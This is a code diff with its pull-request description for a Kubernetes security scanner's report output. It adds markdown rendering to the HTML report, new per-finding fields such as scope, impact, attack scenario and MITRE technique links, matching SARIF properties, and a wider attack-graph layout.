+    var s = String(text || '');
+    var out = '';
+    var i = 0;
+    while (i < s.length) {
+      var bold = s.indexOf('**', i);
+      var code = s.indexOf('` + "`" + `', i);
+      var next = -1, which = null;
+      if (bold >= 0 && (code < 0 || bold < code)) { next = bold; which = 'bold'; }
+      else if (code >= 0) { next = code; which = 'code'; }
+      if (next < 0) { out += escapeHtml(s.slice(i)); break; }
+      if (next > i) out += escapeHtml(s.slice(i, next));
+      if (which === 'bold') {
+        var end = s.indexOf('**', next + 2);
+        if (end < 0) { out += escapeHtml(s.slice(next)); break; }
+        out += '<strong>' + escapeHtml(s.slice(next + 2, end)) + '</strong>';
+        i = end + 2;
+      } else {
+        var endC = s.indexOf('` + "`" + `', next + 1);
+        if (endC < 0) { out += escapeHtml(s.slice(next)); break; }
+        out += '<code>' + escapeHtml(s.slice(next + 1, endC)) + '</code>';
+        i = endC + 1;
+      }
+    }
+    return out;
+  }
+
+  // renderMarkdownBlocks splits text into block-level chunks: paragraphs (\n\n
+  // separated), bullet lists (lines all starting with "- " or "* "), and
+  // numbered lists (lines all starting with "N. "). Each block is appended to
+  // container; inline markdown inside is handled by renderInline.
+  function renderMarkdownBlocks(text, container) {
+    var t = String(text || '').replace(/\r\n/g, '\n').trim();
+    if (!t) return;
+    t.split(/\n\n+/).forEach(function(para) {
+      para = para.replace(/^\n+|\n+$/g, '');
+      if (!para) return;
+      var lines = para.split('\n');
+      var nonEmpty = lines.filter(function(l) { return l.trim().length > 0; });
+      var allBullets = nonEmpty.length > 0 && nonEmpty.every(function(l) { return /^\s*[-*]\s+/.test(l); });
+      var allNum = nonEmpty.length > 0 && nonEmpty.every(function(l) { return /^\s*\d+\.\s+/.test(l); });
+      if (allBullets && nonEmpty.length >= 1) {
+        var ul = document.createElement('ul');
+        nonEmpty.forEach(function(l) {
+          var li = document.createElement('li');
+          renderInline(l.replace(/^\s*[-*]\s+/, ''), li);
+          ul.appendChild(li);
+        });
+        container.appendChild(ul);
+      } else if (allNum && nonEmpty.length >= 1) {
+        var ol = document.createElement('ol');
+        nonEmpty.forEach(function(l) {
+          var li = document.createElement('li');
+          renderInline(l.replace(/^\s*\d+\.\s+/, ''), li);
+          ol.appendChild(li);
+        });
+        container.appendChild(ol);
+      } else {
+        var p = document.createElement('p');
+        lines.forEach(function(l, idx) {
+          if (idx > 0) p.appendChild(document.createElement('br'));
+          renderInline(l, p);
+        });
+        container.appendChild(p);
+      }
+    });
+  }
+
   // renderPanel composes the side-panel content for one node. All Finding-derived strings go
   // through textContent (via the el() helper) so untrusted content never reaches innerHTML.
   // Glossary/technique/category prose is HTML pre-vetted by Go and is allowed via 'html'.
   function renderPanel(node) {
     panelBody.innerHTML = '';
-    panelTitle.textContent = node.Title || 'Detail';
+    panelTitle.textContent = '';
+    renderInline(node.Title || 'Detail', panelTitle);
 
     var hd = el('div', { class: 'kp-panel-meta' });
     if (node.Severity) hd.appendChild(el('span', { class: 'kp-sev-badge kp-sev-' + node.Severity, text: severityLabel(node.Severity) }));
@@ -340,17 +453,24 @@ const kpGraphScript = `
       ]);
       if (category.Examples && category.Examples.length) {
         var ul = el('ul', { class: 'kp-examples' });
-        category.Examples.forEach(function(ex) { ul.appendChild(el('li', { text: ex })); });
+        category.Examples.forEach(function(ex) {
+          var li = document.createElement('li');
+          renderInline(ex, li);
+          ul.appendChild(li);
+        });
         csec.appendChild(ul);
       }
       panelBody.appendChild(csec);
     }
 
     if (node.Description) {
-      panelBody.appendChild(el('section', { class: 'kp-section' }, [
-        el('h4', { text: 'Why this finding fires' }),
-        el('p', { class: 'kp-prose', text: node.Description })
-      ]));
+      var descSec = el('section', { class: 'kp-section' }, [
+        el('h4', { text: 'Why this finding fires' })
+      ]);
+      var descBody = el('div', { class: 'kp-prose' });
+      renderMarkdownBlocks(node.Description, descBody);
+      descSec.appendChild(descBody);
+      panelBody.appendChild(descSec);
     }
 
     var techKey = node.TechniqueKey;
@@ -495,28 +615,26 @@ const kpGraphScript = `
 
   // renderRemediation parses a remediation string. Backtick spans that look
   // like full commands (contain spaces or start with kubectl/kubeadm/helm) are
-  // emitted as separate code blocks AFTER the prose; short identifier-style
-  // backticks render as inline <code>. Non-backtick text becomes plain text
-  // (via textContent — never innerHTML).
+  // collected as separate copy-able code blocks AFTER the prose; everything
+  // else flows through renderMarkdownBlocks so paragraphs, bullets, and
+  // **bold** render correctly. All content goes through textContent — never
+  // innerHTML — so analyzer strings can never inject markup.
   function renderRemediation(text) {
-    var prose = el('p', { class: 'kp-prose' });
+    var s = String(text || '');
     var commands = [];
-    var re = /` + "`" + `([^` + "`" + `]+)` + "`" + `/g;
-    var lastIdx = 0;
-    var m;
-    while ((m = re.exec(text)) !== null) {
-      if (m.index > lastIdx) prose.appendChild(document.createTextNode(text.slice(lastIdx, m.index)));
-      var inner = m[1];
+    // Pull out command-shaped backtick spans up-front; replace them with a
+    // sentinel so they vanish from the prose. Identifier-style backticks
+    // (no spaces, not a known CLI) stay inline and render as <code>.
+    var sanitized = s.replace(/` + "`" + `([^` + "`" + `]+)` + "`" + `/g, function(_, inner) {
       var isCmd = /\s/.test(inner) || /^(kubectl|kubeadm|helm|kubectl-)/.test(inner);
       if (isCmd) {
         commands.push(inner);
-        prose.appendChild(el('code', { text: inner }));
-      } else {
-        prose.appendChild(el('code', { text: inner }));
+        return ''; // command renders as its own block below
       }
-      lastIdx = m.index + m[0].length;
-    }
-    if (lastIdx < text.length) prose.appendChild(document.createTextNode(text.slice(lastIdx)));
+      return '` + "`" + `' + inner + '` + "`" + `';
+    });
+    var prose = el('div', { class: 'kp-prose' });
+    renderMarkdownBlocks(sanitized, prose);
     return { prose: prose, commands: commands };
   }
 
@@ -531,15 +649,17 @@ const kpGraphScript = `
   function tooltipBody(node) {
     var lines = [];
     var glossary = node.GlossaryKey && payload.Glossary ? payload.Glossary[node.GlossaryKey] : null;
-    if (node.Subtitle) lines.push('<div class="kp-tt-sub">' + escapeHtml(node.Subtitle) + '</div>');
-    if (glossary && glossary.Short) lines.push('<div>' + escapeHtml(glossary.Short) + '</div>');
+    // Use renderInlineHTML so backticks/**bold** in finding-derived text render
+    // as <code>/<strong> instead of leaking through as raw markdown chars.
+    if (node.Subtitle) lines.push('<div class="kp-tt-sub">' + renderInlineHTML(node.Subtitle) + '</div>');
+    if (glossary && glossary.Short) lines.push('<div>' + renderInlineHTML(glossary.Short) + '</div>');
     if (node.Kind === 'capability' && node.Description) {
-      lines.push('<div class="kp-tt-why"><span class="kp-tt-tag">Why it matters</span><br>' + escapeHtml(firstSentence(node.Description, 140)) + '</div>');
+      lines.push('<div class="kp-tt-why"><span class="kp-tt-tag">Why it matters</span><br>' + renderInlineHTML(firstSentence(node.Description, 140)) + '</div>');
     }
     if (node.Kind === 'impact') {
       var cat = node.RiskCategory && payload.Categories ? payload.Categories[node.RiskCategory] : null;
       if (cat && cat.Examples && cat.Examples.length) {
-        lines.push('<div class="kp-tt-why"><span class="kp-tt-tag">Example</span><br>' + escapeHtml(cat.Examples[0]) + '</div>');
+        lines.push('<div class="kp-tt-why"><span class="kp-tt-tag">Example</span><br>' + renderInlineHTML(cat.Examples[0]) + '</div>');
       }
     }
     lines.push('<div class="kp-tt-hint">Click for full explainer →</div>');

--- a/internal/report/report.go
+++ b/internal/report/report.go
@@ -451,6 +451,9 @@ func writeCSV(path string, findings []models.Finding) error {
 		"Severity",
 		"Score",
 		"Category",
+		"Scope",
+		"Scope Detail",
+		"Impact",
 		"Subject Kind",
 		"Subject Name",
 		"Subject Namespace",
@@ -488,6 +491,9 @@ func writeCSV(path string, findings []models.Finding) error {
 			string(finding.Severity),
 			fmt.Sprintf("%.1f", finding.Score),
 			string(finding.Category),
+			string(finding.Scope.Level),
+			finding.Scope.Detail,
+			finding.Impact,
 			subjectKind,
 			subjectName,
 			subjectNamespace,
@@ -570,12 +576,31 @@ func writeHTML(path string, snapshot models.Snapshot, findings []models.Finding)
 		"score": func(v float64) string {
 			return fmt.Sprintf("%.1f", v)
 		},
-		"add":    func(a, b int) int { return a + b },
-		"sub":    func(a, b int) int { return a - b },
-		"div":    func(a, b int) int { return a / b },
-		"midY":   func(n GraphNode) int { return n.Y + n.Height/2 },
-		"rightX": func(n GraphNode) int { return n.X + n.Width },
-		"catKey": func(c models.RiskCategory) string { return categoryCSSKey(c) },
+		"add":      func(a, b int) int { return a + b },
+		"sub":      func(a, b int) int { return a - b },
+		"div":      func(a, b int) int { return a / b },
+		"midY":     func(n GraphNode) int { return n.Y + n.Height/2 },
+		"rightX":   func(n GraphNode) int { return n.X + n.Width },
+		"catKey":   func(c models.RiskCategory) string { return categoryCSSKey(c) },
+		"catLabel": func(c models.RiskCategory) string { return categoryLabel(c) },
+		"scopeLabel": func(level models.ScopeLevel) string {
+			return level.Label()
+		},
+		// scopeDetailHTML renders a scope detail string with backtick-quoted spans wrapped in <code>.
+		// Subject/resource keys like `prod/svc-a` become <code>prod/svc-a</code> for visual emphasis
+		// without forcing analyzers to ship raw HTML.
+		"scopeDetailHTML": func(detail string) template.HTML {
+			return template.HTML(renderInlineCode(detail))
+		},
+		// descriptionHTML splits a description into <p> blocks on blank lines and inline-renders
+		// backtick spans as <code>. Analyzers can write 1-3 short paragraphs separated by "\n\n".
+		"descriptionHTML": func(description string) template.HTML {
+			return template.HTML(renderParagraphs(description))
+		},
+		// remediationStepHTML inline-renders a single remediation step, allowing backtick code spans.
+		"remediationStepHTML": func(step string) template.HTML {
+			return template.HTML(renderInlineCode(step))
+		},
 		"pluralize": func(n int, singular, plural string) string {
 			if n == 1 {
 				return singular
@@ -678,6 +703,69 @@ func categoryLabel(category models.RiskCategory) string {
 	default:
 		return strings.Title(strings.ReplaceAll(string(category), "_", " "))
 	}
+}
+
+// renderParagraphs splits text on blank lines into <p> blocks and inline-renders backtick spans
+// as <code>. Each paragraph is HTML-escaped before backtick substitution so analyzer-supplied
+// content cannot inject markup. Returns a string ready to be wrapped in template.HTML.
+func renderParagraphs(text string) string {
+	text = strings.TrimSpace(text)
+	if text == "" {
+		return ""
+	}
+	var b strings.Builder
+	for _, para := range strings.Split(text, "\n\n") {
+		para = strings.TrimSpace(para)
+		if para == "" {
+			continue
+		}
+		b.WriteString("<p>")
+		b.WriteString(renderInlineCode(para))
+		b.WriteString("</p>")
+	}
+	return b.String()
+}
+
+// stripMarkdown removes markdown markers (backticks, **bold**) so a string can be
+// rendered into a context that has no markup support — primarily SVG <text> elements
+// in the attack graph. Content stays intact; only the delimiter characters are dropped.
+func stripMarkdown(text string) string {
+	if text == "" {
+		return text
+	}
+	out := strings.ReplaceAll(text, "**", "")
+	out = strings.ReplaceAll(out, "`", "")
+	return out
+}
+
+// renderInlineCode HTML-escapes text and replaces backtick-delimited spans with <code> tags.
+// Used for inline rendering of identifiers (resource names, kubectl flags) inside descriptions
+// and remediation steps. Single newlines become <br> for natural line breaks within a paragraph.
+func renderInlineCode(text string) string {
+	escaped := template.HTMLEscapeString(text)
+	var b strings.Builder
+	b.Grow(len(escaped))
+	inCode := false
+	for _, r := range escaped {
+		if r == '`' {
+			if inCode {
+				b.WriteString("</code>")
+			} else {
+				b.WriteString("<code>")
+			}
+			inCode = !inCode
+			continue
+		}
+		if r == '\n' && !inCode {
+			b.WriteString("<br>")
+			continue
+		}
+		b.WriteRune(r)
+	}
+	if inCode { // unmatched backtick — close the tag so HTML stays valid
+		b.WriteString("</code>")
+	}
+	return b.String()
 }
 
 // categoryCSSKey maps a RiskCategory to the short CSS class suffix used by the heatmap cells and graph nodes.
@@ -1203,11 +1291,14 @@ func buildAttackGraph(findings []models.Finding, resourceMap, subjectMap map[str
 		}
 	}
 
-	// Lane geometry.
+	// Lane geometry. Gaps between lanes (40px entry→cap, 80px cap→impact) give
+	// the bezier edges horizontal room to fan out — the cap→impact gap was
+	// previously 20px, which made many edges overlap when several capabilities
+	// converged on the same impact node.
 	const (
 		laneEntryX, laneEntryW   = 20, 300
-		laneCapX, laneCapW       = 360, 340
-		laneImpactX, laneImpactW = 720, 240
+		laneCapX, laneCapW       = 360, 360
+		laneImpactX, laneImpactW = 800, 240
 		topY                     = 50
 		capGap                   = 14
 		entryGap                 = 18
@@ -1217,12 +1308,12 @@ func buildAttackGraph(findings []models.Finding, resourceMap, subjectMap map[str
 		// text shows — this tool is educational, so we never truncate.
 		// Entry/cap left padding is 26/22px to clear the severity dot at top-left.
 		entryTextPx  = laneEntryW - 26 - 12  // 262
-		capTextPx    = laneCapW - 22 - 12    // 306
+		capTextPx    = laneCapW - 22 - 12    // 326
 		impactTextPx = laneImpactW - 16 - 12 // 212
 	)
 
 	g := AttackGraph{
-		Width: 980,
+		Width: 1080,
 		Lanes: [3]GraphLane{
 			{X: laneEntryX, Label: "Entry point", LabelX: laneEntryX + laneEntryW/2, LabelW: 110},
 			{X: laneCapX, Label: "Abused capability", LabelX: laneCapX + laneCapW/2, LabelW: 175},
@@ -1255,12 +1346,16 @@ func buildAttackGraph(findings []models.Finding, resourceMap, subjectMap map[str
 		})
 	}
 
-	// Build capability nodes.
+	// Build capability nodes. Strip markdown markers (`, **) from the title
+	// before wrapping — SVG <text> can't render <code>/<strong>, so leaving
+	// them in shows raw chars in the node. The popup-pane GraphNodeDetail
+	// keeps the original Title (with markdown) so its prose renderer can show
+	// proper code/bold formatting.
 	capNodes := make([]GraphNode, len(caps))
 	for i, f := range caps {
 		ruleMeta := fmt.Sprintf("%s  ·  score %.1f", f.RuleID, f.Score)
-		ruleLines := wrapForWidth(ruleMeta, capTextPx, 6.3) // rule-id:    10px monospace + letter-spacing
-		titleLines := wrapForWidth(f.Title, capTextPx, 7.2) // node-title: 13px sans 600
+		ruleLines := wrapForWidth(ruleMeta, capTextPx, 6.3)                // rule-id:    10px monospace + letter-spacing
+		titleLines := wrapForWidth(stripMarkdown(f.Title), capTextPx, 7.2) // node-title: 13px sans 600
 		lines, height := composeLines(22, []textCluster{
 			{class: "rule-id", lineHeight: 14, leadIn: 18, lines: ruleLines},
 			{class: "node-title", lineHeight: 17, leadIn: 22, lines: titleLines},
@@ -1846,7 +1941,7 @@ const htmlTemplate = `<!doctype html>
     .graph-intro .kp-hint { display: inline-block; margin-left: 4px; color: var(--accent); font-size: 12.5px; }
     .graph-wrap { margin-top: 10px; overflow-x: auto; }
     .kp-graph-card { position: relative; }
-    .attack-svg { width: 100%; min-width: 980px; height: auto; display: block; }
+    .attack-svg { width: 100%; min-width: 1080px; height: auto; display: block; }
     .attack-svg text { pointer-events: none; user-select: none; }
     .attack-svg rect.lane-pill { fill: rgba(255,255,255,0.025); stroke: var(--border-soft); stroke-width: 0.6; }
     .attack-svg text.lane-hd { font-size: 10.5px; font-weight: 700; letter-spacing: 0.14em; text-transform: uppercase; fill: #8d99b1; }
@@ -1902,7 +1997,7 @@ const htmlTemplate = `<!doctype html>
     .attack-svg.kp-hide-sev-med  .edge.med  { opacity: 0.08; }
 
     /* Side detail panel */
-    .kp-detail { position: fixed; top: 80px; right: 24px; width: 380px; max-width: calc(100vw - 48px); max-height: calc(100vh - 110px); overflow-y: auto; background: var(--surface); border: 1px solid var(--border-strong); border-radius: 14px; padding: 18px 20px 22px; z-index: 50; box-shadow: 0 18px 60px rgba(0,0,0,0.55); transform: translateX(20px); opacity: 0; transition: transform 0.22s ease, opacity 0.18s ease; }
+    .kp-detail { position: fixed; top: 80px; right: 24px; width: 580px; max-width: calc(100vw - 48px); max-height: calc(100vh - 110px); overflow-y: auto; background: var(--surface); border: 1px solid var(--border-strong); border-radius: 14px; padding: 20px 24px 24px; z-index: 50; box-shadow: 0 18px 60px rgba(0,0,0,0.55); transform: translateX(20px); opacity: 0; transition: transform 0.22s ease, opacity 0.18s ease; }
     .kp-detail.kp-open { transform: translateX(0); opacity: 1; }
     .kp-detail-hd { display: flex; align-items: flex-start; justify-content: space-between; gap: 10px; margin-bottom: 10px; }
     .kp-detail-hd h3 { font-size: 16px; line-height: 1.3; flex: 1; }
@@ -1974,7 +2069,7 @@ const htmlTemplate = `<!doctype html>
     .kp-tt-tag { display: inline-block; font-size: 10px; font-weight: 700; text-transform: uppercase; letter-spacing: 0.1em; padding: 1px 6px; margin-right: 5px; border-radius: 999px; background: rgba(106,183,255,0.12); color: var(--accent); border: 1px solid rgba(106,183,255,0.25); vertical-align: middle; }
     .kp-tt-hint { margin-top: 6px; color: var(--accent); font-size: 11px; opacity: 0.8; }
 
-    @media (max-width: 980px) {
+    @media (max-width: 1180px) {
       .kp-detail { position: relative; top: auto; right: auto; width: 100%; max-width: 100%; margin-top: 12px; transform: translateY(8px); }
       .kp-detail.kp-open { transform: translateY(0); }
     }
@@ -2111,14 +2206,44 @@ const htmlTemplate = `<!doctype html>
     .finding .rule { font-family: "JetBrains Mono", "SF Mono", Menlo, monospace; font-size: 11px; color: var(--text-mut); padding: 3px 8px; border: 1px solid var(--border); border-radius: 6px; background: rgba(255,255,255,0.02); letter-spacing: 0.02em; }
     .finding .score-lbl { font-size: 12px; color: var(--text-mut); }
     .finding .score-lbl strong { color: var(--text); font-variant-numeric: tabular-nums; font-weight: 600; }
+    .finding .scope-row { display: flex; flex-wrap: wrap; gap: 8px; margin: 8px 0 6px; align-items: center; }
+    .finding .scope-chip { display: inline-flex; align-items: center; gap: 6px; padding: 3px 9px; border-radius: 999px; font-size: 11.5px; font-weight: 600; letter-spacing: 0.04em; text-transform: uppercase; border: 1px solid; }
+    .finding .scope-chip.cluster { color: #ff9a3c; border-color: rgba(255,154,60,0.4); background: rgba(255,154,60,0.08); }
+    .finding .scope-chip.namespace { color: #6ab7ff; border-color: rgba(106,183,255,0.4); background: rgba(106,183,255,0.08); }
+    .finding .scope-chip.workload { color: #a89cf6; border-color: rgba(168,156,246,0.4); background: rgba(168,156,246,0.08); }
+    .finding .scope-chip.object { color: #88d49f; border-color: rgba(136,212,159,0.4); background: rgba(136,212,159,0.08); }
+    .finding .scope-detail { color: var(--text); font-size: 13px; font-weight: 500; }
+    .finding .scope-detail code { background: rgba(255,255,255,0.04); padding: 1px 6px; border-radius: 4px; font-size: 12px; }
     .finding .meta { display: flex; flex-wrap: wrap; gap: 8px 14px; margin: 10px 0; color: var(--text-mut); font-size: 12.5px; }
     .finding .meta .k { color: var(--text-dim); }
     .finding .meta code { background: rgba(255,255,255,0.03); padding: 1px 6px; border-radius: 4px; color: var(--text); }
     .finding .desc { margin: 6px 0 12px; color: #cfd6e5; font-size: 14px; line-height: 1.58; }
-    .finding .rem { display: grid; grid-template-columns: 120px 1fr; gap: 12px; padding: 12px 14px; background: rgba(106,183,255,0.05); border: 1px solid rgba(106,183,255,0.18); border-radius: 10px; font-size: 13.5px; line-height: 1.55; }
-    .finding .rem .k { color: var(--accent); font-weight: 600; font-size: 12px; text-transform: uppercase; letter-spacing: 0.08em; padding-top: 2px; }
+    .finding .desc p { margin-bottom: 8px; }
+    .finding .desc p:last-child { margin-bottom: 0; }
+    .finding .impact { display: grid; grid-template-columns: 90px 1fr; gap: 10px; padding: 10px 14px; background: rgba(255,107,107,0.06); border: 1px solid rgba(255,107,107,0.22); border-radius: 10px; font-size: 13.5px; line-height: 1.5; margin: 8px 0 12px; }
+    .finding .impact .k { color: #ff9a3c; font-weight: 700; font-size: 11px; text-transform: uppercase; letter-spacing: 0.1em; padding-top: 2px; }
+    .finding .impact .v { color: var(--text); }
+    .finding .scenario { margin: 10px 0; padding: 12px 14px; background: rgba(255,154,60,0.04); border: 1px solid rgba(255,154,60,0.18); border-radius: 10px; }
+    .finding .scenario .k { color: #ff9a3c; font-weight: 700; font-size: 11px; text-transform: uppercase; letter-spacing: 0.1em; margin-bottom: 8px; display: block; }
+    .finding .scenario ol { margin: 0; padding-left: 20px; color: var(--text); font-size: 13px; line-height: 1.6; }
+    .finding .scenario ol li { margin-bottom: 4px; }
+    .finding .scenario ol li:last-child { margin-bottom: 0; }
+    .finding .rem { padding: 12px 14px; background: rgba(106,183,255,0.05); border: 1px solid rgba(106,183,255,0.18); border-radius: 10px; font-size: 13.5px; line-height: 1.55; }
+    .finding .rem .k { color: var(--accent); font-weight: 700; font-size: 11px; text-transform: uppercase; letter-spacing: 0.1em; margin-bottom: 8px; display: block; }
+    .finding .rem .summary { color: var(--text); margin-bottom: 8px; }
+    .finding .rem ol { margin: 0; padding-left: 20px; color: var(--text); font-size: 13px; line-height: 1.6; }
+    .finding .rem ol li { margin-bottom: 4px; }
+    .finding .rem ol li:last-child { margin-bottom: 0; }
+    .finding .rem code { background: rgba(255,255,255,0.06); padding: 1px 6px; border-radius: 4px; font-size: 12px; font-family: "JetBrains Mono", "SF Mono", Menlo, monospace; }
     .finding .refs { margin: 10px 0 0; font-size: 13px; color: var(--text-mut); }
     .finding .refs a { word-break: break-all; }
+    .finding .refs ul { list-style: none; padding-left: 0; margin: 6px 0 0; display: grid; gap: 4px; }
+    .finding .refs ul li { padding-left: 14px; position: relative; }
+    .finding .refs ul li::before { content: "↗"; position: absolute; left: 0; color: var(--text-dim); }
+    .finding .mitre { margin: 10px 0 0; font-size: 12.5px; color: var(--text-mut); display: flex; flex-wrap: wrap; gap: 6px; align-items: center; }
+    .finding .mitre .k { color: var(--text-dim); }
+    .finding .mitre a { display: inline-flex; align-items: center; padding: 2px 8px; border: 1px solid var(--border); border-radius: 6px; color: var(--text); font-family: "JetBrains Mono", "SF Mono", Menlo, monospace; font-size: 11px; text-decoration: none; background: rgba(255,255,255,0.02); }
+    .finding .mitre a:hover { border-color: var(--border-strong); background: var(--surface-hover); }
     .finding details { margin-top: 12px; }
     .finding details summary { cursor: pointer; user-select: none; font-size: 12px; color: var(--text-mut); padding: 6px 10px; border: 1px dashed var(--border); border-radius: 8px; display: inline-block; letter-spacing: 0.04em; text-transform: uppercase; font-weight: 600; }
     .finding details[open] summary { color: var(--accent); border-color: var(--border-strong); border-style: solid; }
@@ -2466,27 +2591,66 @@ const htmlTemplate = `<!doctype html>
       <div class="finding-list">
         {{ range .Findings }}
         {{ $anchor := index $.AnchorByID .ID }}
-        <article class="finding {{ sevClass .Severity }}"{{ if $anchor }} id="{{ $anchor }}"{{ end }} data-rule="{{ .RuleID }}" data-severity="{{ sevClass .Severity }}" data-category="{{ catKey .Category }}"{{ if .Resource }} data-resource="{{ resource .Resource }}"{{ end }}>
+        <article class="finding {{ sevClass .Severity }}"{{ if $anchor }} id="{{ $anchor }}"{{ end }} data-rule="{{ .RuleID }}" data-severity="{{ sevClass .Severity }}" data-category="{{ catKey .Category }}"{{ if .Scope.Level }} data-scope="{{ .Scope.Level }}"{{ end }}{{ if .Resource }} data-resource="{{ resource .Resource }}"{{ end }}>
           <div class="finding-hd">
             <h3>{{ .Title }}</h3>
             <span class="badge-sev {{ sevClass .Severity }}">{{ sevShort .Severity }}</span>
             <span class="rule">{{ .RuleID }}</span>
             <span class="score-lbl">Score <strong>{{ score .Score }}</strong></span>
           </div>
-          <div class="meta">
-            <span><span class="k">Category:</span> {{ .Category }}</span>
-            {{ if .Subject }}<span><span class="k">Subject:</span> <code>{{ subject .Subject }}</code></span>{{ end }}
-            {{ if .Resource }}<span><span class="k">Resource:</span> <code>{{ resource .Resource }}</code></span>{{ end }}
-          </div>
-          <p class="desc">{{ .Description }}</p>
-          {{ if .Remediation }}
-          <div class="rem">
-            <div class="k">Remediation</div>
-            <div>{{ .Remediation }}</div>
+          {{ if or .Scope.Level .Scope.Detail }}
+          <div class="scope-row">
+            {{ if .Scope.Level }}<span class="scope-chip {{ .Scope.Level }}" title="Blast-radius level">Scope · {{ scopeLabel .Scope.Level }}</span>{{ end }}
+            {{ if .Scope.Detail }}<span class="scope-detail">{{ scopeDetailHTML .Scope.Detail }}</span>{{ end }}
           </div>
           {{ end }}
-          {{ if .References }}
-          <div class="refs">References: {{ range $i, $ref := .References }}{{ if $i }}, {{ end }}<a href="{{ $ref }}">{{ $ref }}</a>{{ end }}</div>
+          <div class="meta">
+            <span><span class="k">Category:</span> {{ catLabel .Category }}</span>
+            {{ if .Subject }}<span><span class="k">Subject:</span> <code>{{ subject .Subject }}</code></span>{{ end }}
+            {{ if .Resource }}<span><span class="k">Resource:</span> <code>{{ resource .Resource }}</code></span>{{ end }}
+            {{ if and (not .Subject) .Namespace }}<span><span class="k">Namespace:</span> <code>{{ .Namespace }}</code></span>{{ end }}
+          </div>
+          <div class="desc">{{ descriptionHTML .Description }}</div>
+          {{ if .Impact }}
+          <div class="impact">
+            <span class="k">Impact</span>
+            <span class="v">{{ .Impact }}</span>
+          </div>
+          {{ end }}
+          {{ if .AttackScenario }}
+          <div class="scenario">
+            <span class="k">How an attacker abuses this</span>
+            <ol>
+              {{ range .AttackScenario }}<li>{{ . }}</li>{{ end }}
+            </ol>
+          </div>
+          {{ end }}
+          {{ if or .Remediation .RemediationSteps }}
+          <div class="rem">
+            <span class="k">Remediation</span>
+            {{ if .Remediation }}<div class="summary">{{ .Remediation }}</div>{{ end }}
+            {{ if .RemediationSteps }}
+            <ol>
+              {{ range .RemediationSteps }}<li>{{ remediationStepHTML . }}</li>{{ end }}
+            </ol>
+            {{ end }}
+          </div>
+          {{ end }}
+          {{ if .MitreTechniques }}
+          <div class="mitre">
+            <span class="k">MITRE ATT&amp;CK:</span>
+            {{ range .MitreTechniques }}<a href="{{ .URL }}" target="_blank" rel="noopener noreferrer" title="{{ .Name }}">{{ .ID }}</a>{{ end }}
+          </div>
+          {{ end }}
+          {{ if .LearnMore }}
+          <div class="refs">
+            <span>References</span>
+            <ul>
+              {{ range .LearnMore }}<li><a href="{{ .URL }}" target="_blank" rel="noopener noreferrer">{{ .Title }}</a></li>{{ end }}
+            </ul>
+          </div>
+          {{ else if .References }}
+          <div class="refs">References: {{ range $i, $ref := .References }}{{ if $i }}, {{ end }}<a href="{{ $ref }}" target="_blank" rel="noopener noreferrer">{{ $ref }}</a>{{ end }}</div>
           {{ end }}
           {{ if .Evidence }}
           <details>

--- a/internal/report/sarif.go
+++ b/internal/report/sarif.go
@@ -139,6 +139,28 @@ func sarifResults(findings []models.Finding) []sarifResult {
 				"remediation": finding.Remediation,
 			},
 		}
+		if finding.Scope.Level != "" {
+			result.Properties["scope_level"] = finding.Scope.Level
+			if finding.Scope.Detail != "" {
+				result.Properties["scope_detail"] = finding.Scope.Detail
+			}
+		}
+		if finding.Impact != "" {
+			result.Properties["impact"] = finding.Impact
+		}
+		if len(finding.AttackScenario) > 0 {
+			result.Properties["attack_scenario"] = finding.AttackScenario
+		}
+		if len(finding.RemediationSteps) > 0 {
+			result.Properties["remediation_steps"] = finding.RemediationSteps
+		}
+		if len(finding.MitreTechniques) > 0 {
+			ids := make([]string, 0, len(finding.MitreTechniques))
+			for _, technique := range finding.MitreTechniques {
+				ids = append(ids, technique.ID)
+			}
+			result.Properties["mitre_attack"] = ids
+		}
 		if finding.Subject != nil {
 			result.Properties["subject"] = finding.Subject
 		}


### PR DESCRIPTION
## Summary

- Per-finding structured fields — `Scope`, `Impact`, `AttackScenario`, `RemediationSteps`, `LearnMore`, `MitreTechniques` — so every rule ships the full *why-it-fires / what-an-attacker-does / how-to-fix* story instead of two flat strings. Per-analyzer copy moves into a new `content.go` alongside each module's `analyzer.go`. SARIF export carries the new fields as result properties.
- HTML report popup pane: widened 380→580px, splits the Description into paragraphs, and renders backticks as `<code>` and `**bold**` as `<strong>` (was rendering literal characters). New `renderInline` / `renderInlineHTML` / `renderMarkdownBlocks` helpers in `graph_script.go` drive both the side panel and the floating tooltip (which also had a raw `<code>` HTML-escape bug).
- Attack-graph column gap widened — cap → impact lane 20→80px, SVG 980→1080px — so the beziers from many capability nodes to the handful of impact nodes no longer overlap.
- SVG capability node titles strip markdown markers since `<text>` can't render `<code>` / `<strong>`. Glossary Examples switched from raw `<code>` HTML to backtick markdown so they render correctly in both the panel list and impact-node tooltips.

## Test plan

- [x] `make test` (all packages green)
- [x] `make lint` (gofmt + vet)
- [x] Eyeball: open `report.html` from `make e2e` and confirm popup pane, tooltip, and graph column gap render correctly
- [x] Eyeball: hover an impact node and confirm Examples (`failurePolicy: Ignore` etc.) render as code spans
- [x] Eyeball: check SARIF output includes `scope_level`, `impact`, `attack_scenario`, `remediation_steps`, `mitre_attack`

🤖 Generated with [Claude Code](https://claude.com/claude-code)